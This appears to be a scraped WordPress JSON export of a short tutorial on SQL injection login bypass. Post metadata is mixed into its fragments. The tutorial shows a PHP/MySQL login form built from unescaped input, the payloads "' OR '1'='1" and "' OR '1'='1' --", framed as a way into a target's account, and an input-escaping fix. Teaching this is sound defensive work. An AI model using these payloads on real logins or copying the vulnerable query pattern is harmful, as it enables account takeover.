If you are trying to get access to an account of a target and your dictionaries aren’t containing the password, brute force attacks will take to much time and you can’t sniff the important communication, you can possibly get it done with a sql injection.<\/p>\n
Precondition<\/strong> Realization<\/strong> With the following pass inputs you can get access to every target you have entered in the user input.<\/p>\n Prevention<\/strong> If you are trying to get access to an account of a target and your dictionaries aren’t containing the password,<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false},"categories":[26],"tags":[],"_links":{"self":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1273"}],"collection":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1273"}],"version-history":[{"count":1,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1273\/revisions"}],"predecessor-version":[{"id":16958,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1273\/revisions\/16958"}],"wp:attachment":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1273"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1273"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nIt has to be an interface which communicates with an sql database in the background, like a user login of a website. If you believe this will give you access to user accounts of a Windows-PC or an Android-Phone then you are wrong, cause they work absolutely different.<\/p>\n
\n
\nLet’s have a look on a very common example, a login on a HTML\/PHP website with an MySQL database.<\/p>\n\r\n<html>\r\n <form method=post action="">\r\n User: <input type=text name="user">\r\n <br>\r\n Pass: <input type=text name="pass">\r\n <input type="submit" name="data">\r\n <\/form>\r\n<\/html>\r\n\r\n<?php\r\n if($_POST['data'])\r\n {\r\n $mysqli = new mysqli('hostname', 'db_user', 'db_pass', 'db_name');\r\n $query = sprintf("SELECT * FROM users WHERE user='%s' AND pass='%s'",\r\n $_POST['user'], $_POST['pass']);\r\n $result = $mysqli->query($query);\r\n \/\/ login the result\r\n }\r\n?>\r\n<\/pre>\n\r\n' OR '1'='1\r\n# --> SELECT * FROM users WHERE user=<user> AND pass='' OR '1'='1';\r\n\r\n' OR '1'='1' --\r\n# --> SELECT * FROM users WHERE user=<user> AND pass='' OR '1'='1' --';\r\n<\/pre>\n
\n
\nTo make sure sql injection isn’t possible via your website interface always escape all the inputs.<\/p>\n\r\n<?php\r\n if($_POST['data'])\r\n {\r\n $mysqli = new mysqli('hostname', 'db_user', 'db_pass', 'db_name');\r\n $query = sprintf("SELECT * FROM users WHERE user='%s' AND pass='%s'",\r\n $mysqli->real_escape_string($_POST['user']),\r\n $mysqli->real_escape_string($_POST['pass']));\r\n $result = $mysqli->query($query);\r\n \/\/ login the result\r\n }\r\n?>\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"